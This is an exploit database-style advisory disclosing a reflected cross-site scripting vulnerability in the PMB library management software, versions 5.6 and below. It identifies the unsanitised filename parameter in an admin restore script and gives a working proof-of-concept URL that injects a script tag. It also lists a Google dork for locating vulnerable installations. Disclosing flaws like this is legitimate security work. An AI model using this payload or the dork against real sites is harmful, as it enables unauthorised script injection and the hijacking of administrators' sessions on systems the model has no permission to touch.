PMB versions 5.6 and below suffer from a cross site scripting vulnerability.
0ff6c93ac41e938ef27f2d12bb3fb29a
# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Date: 20-04-2020
# Exploit Author: 41-trk (Tarik Bakir)
# Email: tarikbak999[at]gmail.com
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6
-==== Vulnerability ====-
Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php.
-==== POC ====-
http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1
================================